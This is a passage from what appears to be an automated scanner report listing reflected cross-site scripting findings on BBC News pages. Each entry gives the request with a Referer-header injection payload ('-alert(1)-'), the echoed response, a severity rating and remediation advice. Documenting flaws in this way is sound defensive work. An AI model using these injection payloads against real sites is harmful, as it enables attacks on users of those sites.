Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=6b69b'-alert(1)-'f78dd7f4be6

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:43:50 GMT
Keep-Alive: timeout=10, max=514
Expires: Thu, 16 Dec 2010 19:43:50 GMT
Connection: close
Content-Length: 73951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528630000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=6b69b'-alert(1)-'f78dd7f4be6',
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '10059368',
       assetType: 'index',
       uri: '/news/business/
...[SNIP]...

2.180. http://www.bbc.co.uk/news/entertainment-arts-12006516 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12006516

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2a6c'-alert(1)-'0f45fcf8309 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/entertainment-arts-12006516 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=c2a6c'-alert(1)-'0f45fcf8309

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:15 GMT
Keep-Alive: timeout=10, max=778
Expires: Thu, 16 Dec 2010 19:28:15 GMT
Connection: close
Content-Length: 54118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527695000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=c2a6c'-alert(1)-'0f45fcf8309',
       section: 'entertainment-and-arts',
       sectionPath: '/Entertainment and Arts',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12006516',
       assetType: 'stor
...[SNIP]...

2.181. http://www.bbc.co.uk/news/entertainment-arts-12008225 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12008225

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab406'-alert(1)-'5475c0fc2f4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/entertainment-arts-12008225 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=ab406'-alert(1)-'5475c0fc2f4

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:14 GMT
Keep-Alive: timeout=10, max=682
Expires: Thu, 16 Dec 2010 19:28:14 GMT
Connection: close
Content-Length: 56514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527694000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=ab406'-alert(1)-'5475c0fc2f4',
       section: 'entertainment-and-arts',
       sectionPath: '/Entertainment and Arts',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12008225',
       assetType: 'stor
...[SNIP]...

2.182. http://www.bbc.co.uk/news/entertainment-arts-12008226 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12008226

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6323'-alert(1)-'85adb999245 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/entertainment-arts-12008226 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=e6323'-alert(1)-'85adb999245

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:06 GMT
Keep-Alive: timeout=10, max=625
Expires: Thu, 16 Dec 2010 19:28:06 GMT
Connection: close
Content-Length: 54974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527686000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=e6323'-alert(1)-'85adb999245',
       section: 'entertainment-and-arts',
       sectionPath: '/Entertainment and Arts',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12008226',
       assetType: 'stor
...[SNIP]...

2.183. http://www.bbc.co.uk/news/science-environment-11932069 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-11932069

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de543'-alert(1)-'cf04d5cf9cd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/science-environment-11932069 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=de543'-alert(1)-'cf04d5cf9cd

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:15 GMT
Keep-Alive: timeout=10, max=352
Expires: Thu, 16 Dec 2010 19:28:15 GMT
Connection: close
Content-Length: 61721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527695000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=de543'-alert(1)-'cf04d5cf9cd',
       section: 'science-and-environment',
       sectionPath: '/Science and Environment',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '11932069',
       assetType: 'st
...[SNIP]...

2.184. http://www.bbc.co.uk/news/science-environment-11938904 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-11938904

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e3ad'-alert(1)-'9fdc17d30d4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/science-environment-11938904 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=8e3ad'-alert(1)-'9fdc17d30d4

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:15 GMT
Keep-Alive: timeout=10, max=800
Expires: Thu, 16 Dec 2010 19:28:15 GMT
Connection: close
Content-Length: 64949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527695000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=8e3ad'-alert(1)-'9fdc17d30d4',
       section: 'science-and-environment',
       sectionPath: '/Science and Environment',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '11938904',
       assetType: 'st
...[SNIP]...

2.185. http://www.bbc.co.uk/news/science-environment-12007965 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12007965

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8188'-alert(1)-'73e816f6892 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/science-environment-12007965 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=c8188'-alert(1)-'73e816f6892

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:13 GMT
Keep-Alive: timeout=10, max=708
Expires: Thu, 16 Dec 2010 19:28:13 GMT
Connection: close
Content-Length: 59702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527693000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=c8188'-alert(1)-'73e816f6892',
       section: 'science-and-environment',
       sectionPath: '/Science and Environment',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12007965',
       assetType: 'st
...[SNIP]...

2.186. http://www.bbc.co.uk/news/science_and_environment/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science_and_environment/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6db2a'-alert(1)-'1da952b160c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/science_and_environment/ HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=6db2a'-alert(1)-'1da952b160c

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:44:06 GMT
Keep-Alive: timeout=10, max=720
Expires: Thu, 16 Dec 2010 19:44:06 GMT
Connection: close
Content-Length: 65603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528646000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=6db2a'-alert(1)-'1da952b160c',
       section: 'science-and-environment',
       sectionPath: '/Science and Environment',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '10059374',
       assetType: 'in
...[SNIP]...

2.187. http://www.bbc.co.uk/news/technology/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/technology/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff7d8'-alert(1)-'b695f539b62 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/technology/ HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=ff7d8'-alert(1)-'b695f539b62

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:44:05 GMT
Keep-Alive: timeout=10, max=782
Expires: Thu, 16 Dec 2010 19:44:05 GMT
Connection: close
Content-Length: 60167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528645000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=ff7d8'-alert(1)-'b695f539b62',
       section: 'technology',
       sectionPath: '/Technology',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '10059376',
       assetType: 'index',
       uri: '/news/techn
...[SNIP]...

2.188. http://www.bbc.co.uk/news/uk-12005930 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12005930

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66aae'-alert(1)-'262f82366aa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-12005930 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=66aae'-alert(1)-'262f82366aa

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:27:49 GMT
Keep-Alive: timeout=10, max=763
Expires: Thu, 16 Dec 2010 19:27:49 GMT
Connection: close
Content-Length: 70995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527669000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=66aae'-alert(1)-'262f82366aa',
       section: 'uk',
       sectionPath: '/UK',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12005930',
       assetType: 'story',
       uri: '/news/uk-12005930',
       coun
...[SNIP]...

2.189. http://www.bbc.co.uk/news/uk-12006061 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12006061

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e513'-alert(1)-'a5bad9ef133 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-12006061 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=7e513'-alert(1)-'a5bad9ef133

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:10 GMT
Keep-Alive: timeout=10, max=673
Expires: Thu, 16 Dec 2010 19:28:10 GMT
Connection: close
Content-Length: 58543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527690000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=7e513'-alert(1)-'a5bad9ef133',
       section: 'uk',
       sectionPath: '/UK',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12006061',
       assetType: 'story',
       uri: '/news/uk-12006061',
       coun
...[SNIP]...

2.190. http://www.bbc.co.uk/news/uk-12006670 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12006670

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15d5d'-alert(1)-'ae028882e7e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-12006670 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;
Referer: http://www.google.com/search?hl=en&q=15d5d'-alert(1)-'ae028882e7e

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:14 GMT
Keep-Alive: timeout=10, max=760
Expires: Thu, 16 Dec 2010 19:28:14 GMT
Connection: close
Content-Length: 81587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527694000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=15d5d'-alert(1)-'ae028882e7e',
       section: 'uk',
       sectionPath: '/UK',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12006670',
       assetType: 'story',
       uri: '/news/uk-12006670',
       coun
